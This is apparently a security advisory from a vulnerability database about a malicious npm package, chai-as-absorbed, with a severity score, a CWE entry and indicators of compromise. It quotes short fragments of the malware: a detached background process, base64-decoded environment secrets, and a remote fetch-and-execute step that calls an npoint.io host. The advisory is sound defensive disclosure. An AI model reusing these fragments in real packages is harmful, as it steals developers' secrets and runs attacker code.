VDB
GCVE-110-OSM-2026-3013
GCVE-110-OSM-2026-3013
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code.
Payload: lib/caller.js
Key findings:
- Stealth Background Process Spawning in index.js: "spawn("node", [script, JSON.stringify(args)], {
detached: true,
stdio: "..."
- Environment Variable Exfiltration in lib/caller.js: "process.env.DEV_SECRET_KEY);
const v = atob(process.env.DEV_SECRET_VALUE);
..."
- Global Variable Shadowing in lib/caller.js: "const process = {"
- Base64 Decoded Environment Variable in lib/caller.js: "atob(process.env."
- Fetch and Eval/Exec in lib/caller.js: "axios.get(src, { headers: { [k]: v } })).data.cookie;
const handler = new ..."
IOCs:
- urls: http://192.168.1.42:9200, https://api.npoint.io/ef2875f70e59e319189d
- domains: api.npoint.io
- payloadFileHash: 55e70a4e29b5d355b736c515234313b513261de4a22f9ab598b8618503ad33df
Decoded/deobfuscated IOCs:
- urls: https://api.npoint.io/ef2875f70e59e319189d
- domains: api.npoint.io
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | chai-as-absorbed@3.4.1 | * (affected) | — |
Browse GCVE Records
72,580 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.